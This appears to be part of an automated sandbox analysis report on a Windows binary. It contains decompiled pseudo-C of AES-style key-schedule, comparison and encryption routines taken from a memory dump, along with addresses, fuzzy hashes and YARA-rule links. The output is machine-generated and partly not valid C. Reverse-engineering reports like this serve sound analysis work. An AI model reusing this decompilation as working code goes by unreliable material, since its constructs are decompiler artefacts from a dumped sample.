							_t506 =  *(0x457450 + ( *(_t534 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x457c50 + ( *(_t534 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457850 + (_t462 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x457050 + (_t462 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t88 ^  *(_t534 - 0x28);
							 *(_t534 - 0x10) = _t506;
							_t351 =  *(_t534 - 0x24) ^ _t506;
							 *(_t534 - 0xc) = _t351;
							_t464 =  *(_t534 - 0x20) ^ _t351;
							 *(_t534 - 8) = _t464;
							 *(_t534 - 4) =  *(_t534 - 0x1c) ^ _t464;
						} while (_t542 != 0x20);
						goto L12;
					} else {
						if(_t527 == 0x20) {
							_t465 = _t537[7];
							_t535 =  &(_t537[0xc]);
							_t513 = ( *(0x457850 + (_t537[7] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x457450 + (_t465 >> 0x18) * 4) & 0x000000ff ^  *(0x457c50 + (_t465 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457050 + (_t465 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
							_t369 = _t537[1] ^ _t513;
							_t537[8] = _t513;
							_t537[9] = _t369;
							_t467 = _t537[2] ^ _t369;
							_t537[0xa] = _t467;
							_t537[0xb] = _t537[3] ^ _t467;
							_t543 = 4;
							do {
								_t468 =  *(_t535 - 4);
								_t469 =  *(_t535 - 0x18);
								_t519 =  *(0x457c50 + ( *(_t535 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457850 + ( *(_t535 - 4) >> 0x18) * 4) & 0xff000000 ^  *(0x457050 + (_t468 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x457450 + (_t468 & 0x000000ff) * 4) & 0x000000ff ^  *(_t535 - 0x20);
								_t387 =  *(_t535 - 0x1c) ^ _t519;
								 *_t535 = _t519;
								_t535[1] = _t387;
								_t535 =  &(_t535[8]);
								_t470 = _t469 ^ _t387;
								 *(_t535 - 0x18) = _t470;
								 *(_t535 - 0x14) =  *(_t535 - 0x34) ^ _t470;
								_t471 =  *(_t535 - 0x14);
								_t48 = _t543 + 0x456024; // 0x2000000
								_t543 = _t543 + 4;
								_t525 =  *(0x457450 + ( *(_t535 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x457c50 + ( *(_t535 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457850 + (_t471 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x457050 + (_t471 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t48 ^  *(_t535 - 0x30);
								 *(_t535 - 0x10) = _t525;
								_t406 =  *(_t535 - 0x2c) ^ _t525;
								 *(_t535 - 0xc) = _t406;
								_t473 =  *(_t535 - 0x28) ^ _t406;
								 *(_t535 - 8) = _t473;
								 *(_t535 - 4) =  *(_t535 - 0x24) ^ _t473;
							} while (_t543 != 0x1c);
							L12:
							_t539 = _v8;
							_t530 = 1;
							if(_a12 == 1) {
								_t413 =  *(_t539 + 0xf0) << 2;
								if(_t413 != 0) {
									_t493 = _t539 + (_t413 + 2) * 4;
									_t532 = _t539 + 8;
									_t541 = 0;
									do {
										_t541 = _t541 + 4;
										_t413 = _t413 - 4;
										 *((intOrPtr*)(_t532 - 8)) =  *((intOrPtr*)(_t493 - 8));
										 *((intOrPtr*)(_t493 - 8)) =  *((intOrPtr*)(_t532 - 8));
										 *((intOrPtr*)(_t532 - 4)) =  *((intOrPtr*)(_t493 - 4));
										 *((intOrPtr*)(_t493 - 4)) =  *((intOrPtr*)(_t532 - 4));
										_t455 =  *_t532;
										 *_t532 =  *_t493;
										_t532 = _t532 + 0x10;
										_t314 =  *((intOrPtr*)(_t493 + 4));
										 *_t493 = _t455;
										_t493 = _t493 - 0x10;
										 *((intOrPtr*)(_t532 - 0xc)) = _t314;
										 *((intOrPtr*)(_t493 + 0x14)) =  *((intOrPtr*)(_t532 - 0xc));
									} while (_t541 < _t413);
									_t539 = _v8;
									_t530 = 1;
								}
								if( *(_t539 + 0xf0) > _t530) {
									_t414 = _t539 + 8;
									do {
										_t414 =  &(_t414[0x10]);
										_t484 =  *(_t414 - 8);
										_t486 =  *(_t414 - 4);
										 *(_t414 - 8) =  *(0x456050 + ( *(0x457450 + ( *(_t414 - 8) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x456450 + ( *(0x457450 + ( *(_t414 - 8) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x456850 + ( *(0x457450 + (_t484 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x456c50 + ( *(0x457450 + ( *(_t414 - 8) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t488 =  *_t414;
										 *(_t414 - 4) =  *(0x456050 + ( *(0x457450 + ( *(_t414 - 4) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x456450 + ( *(0x457450 + ( *(_t414 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x456850 + ( *(0x457450 + (_t486 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x456c50 + ( *(0x457450 + ( *(_t414 - 4) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t490 = _t414[4];
										 *_t414 =  *(0x456050 + ( *(0x457450 + ( *_t414 >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x456450 + ( *(0x457450 + ( *_t414 >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x456850 + ( *(0x457450 + (_t488 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x456c50 + ( *(0x457450 + ( *_t414 & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t530 = _t530 + 1;
										_t414[4] =  *(0x456050 + ( *(0x457450 + (_t414[4] >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x456450 + ( *(0x457450 + (_t414[4] >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x456850 + ( *(0x457450 + (_t490 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x456c50 + ( *(0x457450 + (_t414[4] & 0x000000ff) * 4) & 0x000000ff) * 4);
									} while (_t530 <  *(_t539 + 0xf0));
								}
							}
							_t270 = E0041C67D(_t539, _a8);
						} else {
							_t270 = 0xffffff53;
						}
					}
				}
				return _t270;
			}














































                                            0x0041c089
                                            0x0041c08d
                                            0x0041c090
                                            0x0041c094
                                            0x0041c09f
                                            0x0041c0a6
                                            0x0041c0ac
                                            0x0041c0b6
                                            0x0041c0c1
                                            0x0041c34b
                                            0x0041c34e
                                            0x0041c3a7
                                            0x0041c3a9
                                            0x0041c3ac
                                            0x0041c3b1
                                            0x0041c3b3
                                            0x0041c3b6
                                            0x0041c3bb
                                            0x0041c3be
                                            0x0041c3bf
                                            0x0041c3bf
                                            0x0041c3c2
                                            0x0041c40c
                                            0x0041c412
                                            0x0041c415
                                            0x0041c418
                                            0x0041c41d
                                            0x0041c41f
                                            0x0041c425
                                            0x0041c427
                                            0x0041c42f
                                            0x0041c432
                                            0x00000000
                                            0x0041c0c7
                                            0x0041c0ca
                                            0x0041c241
                                            0x0041c244
                                            0x0041c2a1
                                            0x0041c2a3
                                            0x0041c2a5
                                            0x0041c2a8
                                            0x0041c2ab
                                            0x0041c2b2
                                            0x0041c2b5
                                            0x0041c2b8
                                            0x0041c2b9
                                            0x0041c2bc
                                            0x0041c2c4
                                            0x0041c2c6
                                            0x0041c2c9
                                            0x0041c2cc
                                            0x0041c316
                                            0x0041c31c
                                            0x0041c31f
                                            0x0041c322
                                            0x0041c328
                                            0x0041c32a
                                            0x0041c330
                                            0x0041c332
                                            0x0041c33a
                                            0x0041c33d
                                            0x00000000
                                            0x0041c0d0
                                            0x0041c0d3
                                            0x0041c0df
                                            0x0041c0e2
                                            0x0041c13f
                                            0x0041c141
                                            0x0041c143
                                            0x0041c146
                                            0x0041c149
                                            0x0041c150
                                            0x0041c153
                                            0x0041c156
                                            0x0041c157
                                            0x0041c157
                                            0x0041c198
                                            0x0041c1a8
                                            0x0041c1ab
                                            0x0041c1ad
                                            0x0041c1af
                                            0x0041c1b2
                                            0x0041c1b5
                                            0x0041c1bc
                                            0x0041c1bf
                                            0x0041c1c2
                                            0x0041c20c
                                            0x0041c212
                                            0x0041c215
                                            0x0041c218
                                            0x0041c21e
                                            0x0041c220
                                            0x0041c226
                                            0x0041c228
                                            0x0041c230
                                            0x0041c233
                                            0x0041c437
                                            0x0041c437
                                            0x0041c43c
                                            0x0041c440
                                            0x0041c44c
                                            0x0041c451
                                            0x0041c456
                                            0x0041c459
                                            0x0041c45c
                                            0x0041c45e
                                            0x0041c461
                                            0x0041c467
                                            0x0041c46a
                                            0x0041c470
                                            0x0041c476
                                            0x0041c47b
                                            0x0041c47e
                                            0x0041c480
                                            0x0041c482
                                            0x0041c485
                                            0x0041c488
                                            0x0041c48a
                                            0x0041c490
                                            0x0041c493
                                            0x0041c496
                                            0x0041c49a
                                            0x0041c49f
                                            0x0041c49f
                                            0x0041c4a6
                                            0x0041c4ac
                                            0x0041c4af
                                            0x0041c4af
                                            0x0041c4b2
                                            0x0041c4e6
                                            0x0041c510
                                            0x0041c53f
                                            0x0041c568
                                            0x0041c597
                                            0x0041c5c0
                                            0x0041c610
                                            0x0041c611
                                            0x0041c614
                                            0x0041c4af
                                            0x0041c4a6
                                            0x0041c625
                                            0x0041c0d5
                                            0x0041c0d5
                                            0x0041c0d5
                                            0x0041c0d3
                                            0x0041c0ca
                                            0x0041c630

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c25b83d57ca42064ac81c88c3139b9276ea9668cc33cfdc1a05424ec2e84860e
                                            • Instruction ID: fc4f756ae0159ccbc05c9466880b563b65dd5dc1b2c18295594a19099735c972
                                            • Opcode Fuzzy Hash: c25b83d57ca42064ac81c88c3139b9276ea9668cc33cfdc1a05424ec2e84860e
                                            • Instruction Fuzzy Hash: 430290756146518FC318CF2EEC8063ABBE1EB8E302745853EE495C7396DB34E921CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042DCD7, Relevance: .3, Instructions: 345COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0042DCD7(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                            0x0042dcd7
                                            0x0042dcd7
                                            0x0042dcdd
                                            0x0042dd64
                                            0x0042dd66
                                            0x0042dd68
                                            0x00000000
                                            0x00000000
                                            0x0042dd6e
                                            0x0042dd74
                                            0x0042ddfb
                                            0x0042ddfd
                                            0x0042ddff
                                            0x00000000
                                            0x00000000
                                            0x0042de05
                                            0x0042de0b
                                            0x0042de92
                                            0x0042de94
                                            0x0042de96
                                            0x00000000
                                            0x00000000
                                            0x0042de9c
                                            0x0042dea2
                                            0x0042df29
                                            0x0042df2b
                                            0x0042df2d
                                            0x00000000
                                            0x00000000
                                            0x0042df33
                                            0x0042df39
                                            0x0042dfc0
                                            0x0042dfc2
                                            0x0042dfc4
                                            0x00000000
                                            0x00000000
                                            0x0042dfd0
                                            0x0042e058
                                            0x0042e05a
                                            0x0042e05c
                                            0x00000000
                                            0x00000000
                                            0x0042e062
                                            0x0042e068
                                            0x0042e0ef
                                            0x0042e0f1
                                            0x0042e0f3
                                            0x0042e0f3
                                            0x00000000
                                            0x0042e0f3
                                            0x0042e075
                                            0x0042e077
                                            0x0042e08f
                                            0x0042e097
                                            0x0042e099
                                            0x0042e0b1
                                            0x0042e0b9
                                            0x0042e0bb
                                            0x0042e0d3
                                            0x0042e0db
                                            0x0042e0dd
                                            0x0042e0e6
                                            0x0042e0e6
                                            0x00000000
                                            0x0042e0dd
                                            0x0042e0c4
                                            0x0042e0cd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e0cd
                                            0x0042e0a2
                                            0x0042e0ab
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e0ab
                                            0x0042e080
                                            0x0042e089
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e089
                                            0x0042dfde
                                            0x0042dfe0
                                            0x0042dff8
                                            0x0042e000
                                            0x0042e002
                                            0x0042e01a
                                            0x0042e022
                                            0x0042e024
                                            0x0042e03c
                                            0x0042e044
                                            0x0042e046
                                            0x0042e04f
                                            0x0042e04f
                                            0x00000000
                                            0x0042e046
                                            0x0042e02d
                                            0x0042e036
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e036
                                            0x0042e00b
                                            0x0042e014
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e014
                                            0x0042dfe9
                                            0x0042dff2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dff2
                                            0x0042df46
                                            0x0042df48
                                            0x0042df60
                                            0x0042df68
                                            0x0042df6a
                                            0x0042df82
                                            0x0042df8a
                                            0x0042df8c
                                            0x0042dfa4
                                            0x0042dfac
                                            0x0042dfae
                                            0x0042dfb7
                                            0x0042dfb7
                                            0x00000000
                                            0x0042dfae
                                            0x0042df95
                                            0x0042df9e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042df9e
                                            0x0042df73
                                            0x0042df7c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042df7c
                                            0x0042df51
                                            0x0042df5a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042df5a
                                            0x0042deaf
                                            0x0042deb1
                                            0x0042dec9
                                            0x0042ded1
                                            0x0042ded3
                                            0x0042deeb
                                            0x0042def3
                                            0x0042def5
                                            0x0042df0d
                                            0x0042df15
                                            0x0042df17
                                            0x0042df20
                                            0x0042df20
                                            0x00000000
                                            0x0042df17
                                            0x0042defe
                                            0x0042df07
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042df07
                                            0x0042dedc
                                            0x0042dee5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dee5
                                            0x0042deba
                                            0x0042dec3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dec3
                                            0x0042de18
                                            0x0042de1a
                                            0x0042de32
                                            0x0042de3a
                                            0x0042de3c
                                            0x0042de54
                                            0x0042de5c
                                            0x0042de5e
                                            0x0042de76
                                            0x0042de7e
                                            0x0042de80
                                            0x0042de89
                                            0x0042de89
                                            0x00000000
                                            0x0042de80
                                            0x0042de67
                                            0x0042de70
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042de70
                                            0x0042de45
                                            0x0042de4e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042de4e
                                            0x0042de23
                                            0x0042de2c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042de2c
                                            0x0042dd81
                                            0x0042dd83
                                            0x0042dd9b
                                            0x0042dda3
                                            0x0042dda5
                                            0x0042ddbd
                                            0x0042ddc5
                                            0x0042ddc7
                                            0x0042dddf
                                            0x0042dde7
                                            0x0042dde9
                                            0x0042ddf2
                                            0x0042ddf2
                                            0x00000000
                                            0x0042dde9
                                            0x0042ddd0
                                            0x0042ddd9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042ddd9
                                            0x0042ddae
                                            0x0042ddb7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042ddb7
                                            0x0042dd8c
                                            0x0042dd95
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dce3
                                            0x0042dce3
                                            0x0042dcea
                                            0x0042dcec
                                            0x0042dd04
                                            0x0042dd04
                                            0x0042dd0c
                                            0x0042dd0e
                                            0x0042dd26
                                            0x0042dd26
                                            0x0042dd2e
                                            0x0042dd30
                                            0x0042dd48
                                            0x0042dd48
                                            0x0042dd50
                                            0x0042dd52
                                            0x0042dd5b
                                            0x0042dd5b
                                            0x00000000
                                            0x0042dd52
                                            0x0042dd36
                                            0x0042dd39
                                            0x0042dd42
                                            0x0042d89a
                                            0x0042d89a
                                            0x0042e68b
                                            0x0042e68b
                                            0x00000000
                                            0x0042dd42
                                            0x0042dd14
                                            0x0042dd17
                                            0x0042dd20
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dd20
                                            0x0042dcf2
                                            0x0042dcf5
                                            0x0042dcfe
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dcfe

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction ID: 2694807e93206870f37ff57ccb5ca937060c38fa0587cb7e3f8a392237a12684
                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction Fuzzy Hash: 62C18632B0917309DB1D463A943407FBBA19EA27B135A475FD4F3CB2C8EE28C565D628
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041BB8F, Relevance: .3, Instructions: 342COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041BB8F(signed int* __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				unsigned int _v20;
				unsigned int _v24;
				unsigned int _v28;
				unsigned int _v32;
				unsigned int _v36;
				unsigned int _t222;
				signed int _t229;
				signed int _t230;
				signed int _t258;
				intOrPtr _t338;
				intOrPtr _t347;
				intOrPtr _t356;
				intOrPtr _t369;
				unsigned int _t373;
				signed char _t379;
				unsigned int _t406;
				unsigned int _t422;
				unsigned int _t440;
				intOrPtr* _t478;
				unsigned int _t481;
				signed int _t485;
				unsigned int _t488;
				unsigned int _t489;
				unsigned int _t496;
				intOrPtr* _t506;
				unsigned int _t507;
				signed int _t509;
				unsigned int _t510;
				signed int* _t513;
				unsigned int _t515;
				unsigned int _t516;
				signed int _t518;

				_t513 = __ecx;
				_t506 = __edx;
				_t222 =  *(__ecx + 0xf0) >> 1;
				_v36 = _t222;
				if(_t222 <= 7 && _t222 != 0) {
					_v16 = E0041BA5E( *((intOrPtr*)(__edx + 4))) ^ _t513[1];
					_v12 = E0041BA5E( *((intOrPtr*)(_t506 + 8))) ^ _t513[2];
					_v32 = E0041BA5E( *((intOrPtr*)(_t506 + 0xc))) ^ _t513[3];
					_t229 = E0041BA5E( *_t506);
					_t230 = E0041BB72();
					_t507 = _v12;
					_t373 = _t229 ^  *_t513 | _t230;
					_t481 = _v32;
					_v24 =  *(0x457850 + (_t507 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457450 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457050 + (_t373 >> 0x18) * 4) ^  *(0x457c50 + (_t481 & 0x000000ff) * 4) ^ _t513[4];
					_v20 =  *(0x457850 + (_t481 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457450 + (_t507 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457050 + (_v16 >> 0x18) * 4) ^  *(0x457c50 + (_t373 & 0x000000ff) * 4) ^ _t513[5];
					_v8 =  *(0x457450 + (_t481 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457050 + (_t507 >> 0x18) * 4);
					_v8 = _v8 ^  *(0x457850 + (_t373 >> 0x00000008 & 0x000000ff) * 4);
					_t406 = _v16;
